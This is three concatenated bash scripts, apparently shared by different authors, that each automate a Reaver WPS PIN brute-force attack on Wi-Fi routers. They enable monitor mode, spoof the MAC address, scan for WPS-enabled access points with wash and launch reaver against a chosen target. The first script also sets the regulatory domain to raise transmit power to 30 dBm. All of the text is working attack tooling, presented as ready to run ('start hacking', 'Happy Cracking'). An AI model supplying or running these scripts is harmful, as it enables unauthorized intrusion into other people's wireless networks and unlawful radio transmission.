#!/bin/bash
# This is a linux bash script i wrote that runs best on Backtrack 5 KDE
# It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh)
# then chmod +x <thefilename> and run it ./<filename>
# enjoy
 
# Attack WPS enabled routers
 
clear
tput setaf 2; echo "##################################################################################"
tput setaf 2; echo "#          ~Automate reaver WPS attack Bash script written by j0k3rr~            #"
tput setaf 2; echo "#    1-Tested on Backtrack 5 KDE                                                #"
tput setaf 2; echo "#    2-Make sure your wifi card is plugged in before starting the script        #"
tput setaf 2; echo "#    3-Any problems with the script feel free to contact me on twitter @j0k3rr1  #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "##################################################################################"
 
 
tput setaf 1; read -p "Press [Enter] to start hacking..."
 
clear
tput setaf 1; ifconfig | grep "wlan"
# Select your Wireless Interface ( wlan0 , wlan1, wlan2 )
 
tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface
 
# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit
 
tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read a
if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
        iw reg set BO
        iwconfig $winterface txpower 30
      else
      echo "continuing without changing the TX power"
fi
 
# Spoof Mac Address and put card into monitor mode
tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"
 
read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        airmon-ng stop $winterface
        ifconfig $winterface down
        macchanger --mac 00:11:22:33:44:55 $winterface
        ifconfig $winterface up
        tput setaf 1; airmon-ng start $winterface
        else
        tput setaf 1; echo "continuing without changing the mac address"
        tput setaf 1; airmon-ng start $winterface
fi
 
 
tput setaf 2; read -p "Whats the monitor mode interface? (Usually mon0) " minterface
 
# Start airodump-ng to monitor the airwaves.
clear
tput setaf 1; echo  "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i $minterface
sleep 5
# Prompt user for Targets BSSID #
 
tput setaf 2; echo "Input the WPS enabled access points details: "
tput setaf 1; read -p "BSSID: " xBSSID
tput setaf 1; read -p "Channel number: " xCH
# Attack the Access point
 
konsole --hold -e reaver -i $minterface  -c $xCH -b $xBSSID -vv &
 
# End
 
clear
tput setaf 2; echo "[+] Process Started:"
tput setaf 2; echo "[+] Attacking " $xBSSID "on channel " $xCH " Goodluck and Happy Cracking"
wait

#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi

#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012
 
#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0
 
#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15
 
#Flag to allow user to choose target AP
allow_user_choice=1
 
#Delay between attack attempts
reaver_delay=0
 
#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1
fi
 
#Check for required commands
for command in airmon-ng wash reaver
do
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "http://lmgtfy.com/?q=$command+installation"
     exit 1
  fi
done
 
echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
 
#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null
  fi
done
 
echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null
 
echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
 
if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      n=1
      echo "The following access points were detected"
      for ap in $APs
      do
        echo "* $n: $ap"
        ((n++))
      done
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
      else
echo "Invalid choice!"
exit 1
      fi
   else
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   fi
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1
fi